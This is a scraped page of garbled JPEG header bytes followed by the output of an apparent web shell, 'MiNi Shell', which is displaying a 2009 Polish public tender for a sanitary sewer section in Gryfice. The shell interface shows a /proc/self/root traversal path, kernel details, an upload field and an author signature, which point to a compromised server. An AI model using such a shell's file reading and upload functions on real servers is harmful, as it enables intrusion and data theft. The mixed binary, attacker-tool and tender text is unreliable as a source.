JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090703/222646-N-2009.html

<p class="kh_header"><b>Gryfice: Budowa odcinka kanalizacji sanitarnej grawitacyjnej z przykanalikami w ul. Piłsudskiego w Gryficach, od istniejącej studni S535 do projektowanej studni S550.</b><br>
<b>Numer ogłoszenia: 222646 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej , ul. Zielona 5, 72-300 Gryfice, woj. zachodniopomorskie, tel. 091 3842047, faks 091 3842214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgk.gryfice.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa odcinka kanalizacji sanitarnej grawitacyjnej z przykanalikami w ul. Piłsudskiego w Gryficach, od istniejącej studni S535 do projektowanej studni S550..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2..  Zadanie obejmuje następujący zakres robót budowlanych:
2.1kanał grawitacyjny PVC-U  O 400 mm z rur SN 8 SDR 34, gr. ścianki 11,7 mm, łączonych na uszczelkę gumową 673 m
2.2studnie rewizyjne i połączeniowe O 1200 mm z elementów prefabrykowanych betonowych B-45 łączonych na uszczelki gumowe z przejściami szczelnymi, ze stopniami włazowymi; podstawy studni prefabrykowane z ukształtowaną kinetą; przykrycia studni zwężkami żelbetowymi z włazami żeliwnymi O 600 mm - włazy żeliwne klasy D-400 kN  15 szt.
2.3 przykanaliki PVC-U O 160 mm z rur SN 8 SDR 34, gr. ścianki 4,7 mm   157,5 m
2.4 studzienki kanalizacyjne z tworzyw sztucznych O 315 mm z włazami o zróżnicowanych typach obciążeń (szczegółowe dane w przedmiarze robót)   12 szt.
2.5montaż kształtek na kanale O 400 mm - trójników PVC 400/160  2 szt.
3.    Projektowaną kanalizacje sanitarną należy realizować przy spełnieniu następujących warunków:
3.1.	Roboty rozbiórkowe nawierzchni  z mieszanek mineralno-bitumicznych i podbudów  z kruszywa kamiennego oraz  instalacja przewodów  kanalizacyjnych będą wykonywane metodą wykopu otwartego o ścianach pionowych z pełnym umocnieniem ścian palami szalunkowymi wypraskami na długości 645 m (kanał) i 32 m (przykanaliki), z odwodnieniem drenażowym na długości 254 m. 
3.2.	Zamawiający założył w kosztorysie nakładczym (co należy uwzględnić przy sporządzaniu oferty), że przejścia poprzeczne przez jezdnię będą wykonane metodą przewiertów sterowanych: dla rurociągu PVC O400 mm w rurze osłonowej stalowej O 509 mm oraz dla rurociągu O 160 mm w rurze osłonowej stalowej 219,1 mm.                      Stosownie do uzyskanych warunków zajęcia pasa drogi wojewódzkiej od Zarządcy Drogi, Wykonawca - w porozumieniu z Zamawiającym - w fazie realizacji zastosuje odpowiedni sposób przekroczenia jezdni. Jeśli technologia przekroczenia jezdni okaże się odmienna od technologii założonej przez Zamawiającego w przedmiarze, rozliczenie robót odbędzie się kosztorysem zamiennym wg danych wyjściowych 
do kosztorysowania podanych w załączniku do oferty (wzór załącznik nr 5 do SIWZ). 
3.3.	Roboty będą prowadzone odcinkami w celu ograniczenia utrudnień w ruch drogowym zgodnie z  zatwierdzonym projektem organizacji ruchu.
3.4.	na dojazdach do posesji , na czas trwania robót należy zakładać przenośne mostki przejazdowe dla ruchu kołowego bądź kładki dla pieszych.
4.  Teren inwestycji jest uzbrojony w następujące sieci:
     -wodociągową , energetyczną, gazową i telekomunikacyjną .Przed realizacją zadania  Wykonawca jest obowiązany zapoznać się z aktualnym uzbrojeniem terenu w Powiatowym  Ośrodku Geodezyjno-Kartograficznym w Gryficach.
5.   Oprócz wykonania robót budowlanych, przedmiot zamówienia obejmuje:
5.1 opracowanie i zatwierdzenie projektu organizacji ruchu  w czterech egzemplarzach na prowadzenie robót w drodze wojewódzkiej nr 109,         
5.2.  wszelkie koszty związane z zajęciem pasa drogowego, próbami szczelności, ubezpieczeniem placu budowy,
5.3.  wykonanie wszelkich niezbędnych dokumentów związanych z przekazaniem do użytkowania wykonanego obiektu, w tym oświadczeń właścicieli terenu, na którym prowadzone będą roboty,                 o doprowadzeniu terenu do stanu przed rozpoczęciem robót,
5.4. zapewnienie obsługi geodezyjnej (wytyczenie punktów głównych, obsługa w trakcie realizacji), sporządzenie szkiców inwentaryzacyjnych w 2 egz., wykonanie inwentaryzacji powykonawczej                        w 3-ch egzemplarzach, zarejestrowanej w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej w Gryficach.
5.5. zorganizowanie i zabezpieczenie terenu budowy oraz zapewnienie stałych warunków widoczności w dzień i w nocy tych elementów oznakowania, które są niezbędne za względów bezpieczeństwa.
5.6. zapewnienie stałego utrzymania porządku i czystości wewnątrz i bezpośrednio na zewnątrz terenu budowy oraz utrzymanie w stanie estetycznym ogrodzeń i obiektów tymczasowych budowy,
5.7. zapewnienie nadzoru technicznego ze strony właścicieli urządzeń obcych kolidujących                          z robotami,
5.8. opracowanie planu bezpieczeństwa i ochrony zdrowia.
5.9. zapewnienie właściwych warunków bezpieczeństwa i higieny pracy oraz ochrony środowiska               w miejscu robót i jego otoczeniu zgodnie z opracowanym planem bezpieczeństwa i ochrony zdrowia
(art. 21a Ustawy Prawo budowlane),
5.10. wbudowanie materiałów odpowiadających co do jakości wymaganiom określonym ustawą                   z dnia 16 kwietnia 2004 r. o wyrobach budowlanych ( Dz. U. nr 92 poz. 881 ze zm.) oraz wymaganiom określonym w Dokumentacji projektowej i Specyfikacji technicznej wykonania i odbioru robót budowlanych,
5.11. usunięcie odpadów powstałych w trakcie realizacji zamówienia poza teren robót, zgodnie 
z zasadami utylizacji i składowania materiałów odpadowych określonych Ustawą z dnia 27 kwietnia 2001 r. o odpadach (tekst jednolity Dz. U. z 2007 r. nr 39 poz. 251 ze zm.) oraz zapisami specyfikacji technicznej wykonania i odbioru robót budowlanych,
5.12. wykonanie robót objętych umową zgodnie ze sztuką budowlaną i zasadami współczesnej wiedzy technicznej, zapewniającej bezpieczne i higieniczne warunki pracy pracowników,
5.13. dostarczenie  wszystkich   materiałów   i   sprzętu   niezbędnych   do  wykonania przedmiotu zamówienia,
5.14. wykonanie przedmiotu zamówienia zgodnie z warunkami technicznymi Zamawiającego,
5.15. zapewnienie Kierownika budowy nadzorującego roboty (z uprawnieniem do nadzoru budowy sieci kanalizacyjnej),
5.16. opracowanie dokumentacji powykonawczej, uwzględniającej  ewentualne zmiany powstałe w trakcie robót.
6. Szczegółowy zakres zamówienia dla robót budowlanych przedstawiono w załączonych:
  kosztorysie nakładczym załączonym do niniejszego opisu;
  specyfikacjach technicznych wykonania i odbioru robót;
  planszach realizacyjnych oraz profilu podłużnym przedmiotowego odcinka sieci kanalizacyjnej;
  opisie technicznym części technologicznej i odwodnienia wykopów (w zakresie dotyczącym  
  przedmiotowego odcinka sieci kanalizacyjnej).
  UWAGA: Podstawy wyceny podane w kosztorysie nakładczym mają charakter pomocniczy.  
  Podstawy wyceny mogą posłużyć do skalkulowania ceny robót budowlanych. Wykonawca 
  może także odmiennie, według innych, własnych metod obliczeń skalkulować cenę robót 
  budowlanych w celu opracowania oferty. Podstawę kalkulacji ceny robót powinna 
  stanowić odostępniona w formie elektronicznej dokumentacja projektowa i uwzględnienie 
  założeń Zamawiającego, opisanych w pkt. 3.2. niniejszego opisu przedmiotu 
  zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 18.	WYMAGANIA DOTYCZĄCE WADIUM
18.1.     Oferta powinna być zabezpieczona wadium w wysokości 5.000,00 zł (słownie: pięć tysięcy złotych 00/100).
18.2.     Wadium może być wniesione w następujących formach, w zależności od wyboru Wykonawcy:
a)	pieniądzu wpłaconym na konto Zamawiającego w Banku Spółdzielczym O/Gryfice nr 30 9376 0001 0000 0433 2001 0013;
b)	poręczeniach bankowych lub w poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,                 z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
              e)    poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
                     z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
              W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być gwarancją   
              nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzona  
              zgodnie z obowiązującym prawem i winna zawierać następujące elementy: 
o	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji)                     oraz wskazanie ich siedzib, 
o	 określenie wierzytelności, która ma być zabezpieczona gwarancją, 
o	 kwotę gwarancji, 
o	 termin ważności gwarancji, 
o	 zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie         
          Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
 - odmówił podpisania umowy na warunkach określonych w ofercie, lub 
 - nie wniósł zabezpieczenia należytego wykonania umowy, lub 
 - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
18.3.    Wadium należy wnieść przed terminem składania ofert.
18.4.    Za skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które w oznaczonym terminie            
             w dniu otwarcia ofert znajduje się na rachunku Zamawiającego. Do oferty należy dołączyć 
             oryginał dokumentu potwierdzającego wpłatę wadium. 
18.5.     Wadium musi obejmować cały okres związania ofertą.
18.6.     Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
18.7.     Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium, zostanie wykluczony 
             z postępowania.
18.8.     Zamawiający dokona niezwłocznie zwrotu wadium, jeżeli:
a)	upłynie termin związania ofertą;
b)	zostanie zawarta umowa w sprawie zamówienia publicznego i wniesione zabezpieczenie należytego wykonania umowy;
c)	zamawiający unieważni postępowanie, a protesty zostaną ostatecznie rozstrzygnięte lub upłynie termin do ich wnoszenia.
18.9.      Zamawiający niezwłocznie dokona zwrotu wadium po złożeniu pisemnego wniosku przez Wykonawcę:
a)	który wycofał ofertę przed upływem terminu do składania ofert;
b)	który został wykluczony z postępowania;
c)	którego oferta została odrzucona.
18.10.   Zamawiający zażąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium                       
             na podst. art. 2 pkt 2 i 3 Ustawy Prawo zamówień publicznych, jeżeli w wyniku ostatecznego 
             rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty.  
             Wykonawcy wniosą wadium w terminie określonym przez Zamawiającego.
18.11. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi 
             z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia  
             rachunku oraz prowizję bankową za przelew pieniędzy na rachunek wskazany przez Wykonawcę.
18.12.   Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca pomimo wezwania                     
             do uzupełnienia dokumentów, o którym mowa w art. 26 ust.3 ustawy, nie złoży dokumentów                 
             lub oświadczeń o spełnianiu warunków udziału w postępowaniu oraz wymagań określonych                
             przez Zamawiającego w SIWZ.
18.13.   Wykonawcy, którego oferta zostanie wybrana, Zamawiający zatrzymuje wadium wraz z odsetkami  
             w przypadku gdy:
a)	odmówi podpisania umowy na warunkach określonych w ofercie;
b)	nie wniesie zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6.1.	W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:
6.1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają
obowiązek posiadania takich uprawnień;
6.1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych
podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
6.1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
6.1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
6.2.	Zamawiający dokona oceny spełniania warunków na podstawie złożonego oświadczenia i dokumentów
opisanych w pkt. 7 niniejszej Instrukcji, wg formuły spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy muszą dostarczyć:
7.1.1.	Wypełniony druk formularza oferty (wzór załącznik nr 1 do SIWZ).
7.1.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji
działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania
ofert.
7.1.3.	aktualną informację z Krajowego Rejestru Karnego, a w przypadku osób pochodzących z innego kraju  
              niż Rzeczpospolita Polska, równoważnego zaświadczenia właściwego organu sądowego                            
              lub administracyjnego kraju pochodzenia osoby, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8  ustawy   
              [wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert];      
7.1.4.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy  
               [wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert]; UWAGA: dotyczy 
               wyłącznie podmiotów zbiorowych, w rozumieniu ustawy z dnia 28 października 2002 r.                                       
               o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. Nr 197,             
                poz. 1661), nie dotyczy przedsiębiorców będących osobami fizycznymi, w tym spółek cywilnych  
               utworzonych przez osoby fizyczne;
7.1.5.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego  potwierdzające, że Wykonawca   
            nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie               
               lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu  
               podatkowego [wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert];
7.1.6.	aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy  
               Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem 
                składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczenie, że uzyskał zgodę na zwolnienie,
                odroczenie lub rozłożenie na raty zaległych płatności [wystawione nie wcześniej niż 3 miesiące                       
              przed upływem terminu składania ofert];
7.1.7.	wykaz osób przewidzianych do wykonania zamówienia (wzór załącznik nr 4 do SIWZ). Wykaz należy 
              uzupełnić o następujące dokumenty potwierdzające prawo wykonywania samodzielnych funkcji  
              technicznych w budownictwie przez osoby w nim wymienione:                                                                                                  
              a) uprawnienia budowlane lub stwierdzenie przygotowania zawodowego do pełnienia samodzielnych 
                  funkcji technicznych w budownictwie, tzn. sprawowania funkcji kierownika budowy lub robót 
                  w specjalności instalacyjnej w zakresie sieci kanalizacyjnych;
              b) aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa.
7.1.8.	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia 
              postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy                               
              - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym 
              przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem
       dokumentów potwierdzających, że roboty te zostały wykonane należycie (wzór załącznik nr 3 do SIWZ); 
      Zamawiający uzna w wykazie wartości robót  zrealizowanych na kwoty nie mniejsze 
      niż 100.000,00 zł brutto. 
7.1.9.	polisa, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca                             
     jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
7.1.10.	Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik.
7.2.        Zasady składania oferty przez podmioty występujące wspólnie:
7.2.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą
pełnomocnictwa do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie
zamówienia.
7.2.2.	Oświadczenie w zakresie pkt 10. w druku oferty (wzór załącznik nr 1 do SIWZ) i dokumenty wskazane w pkt. 7.1.2. do 7.1.6., powinny być złożone przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zgk.gryfice.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej , ul. Zielona 5, 72-300 Gryfice, Oddział Obsługi Urzadzeń Komunalnych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 10:00, miejsce: Siedziba Zamawiajacego w Gryficach przy ul. Zielonej 5 budynek Zarządu - pok. 4 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com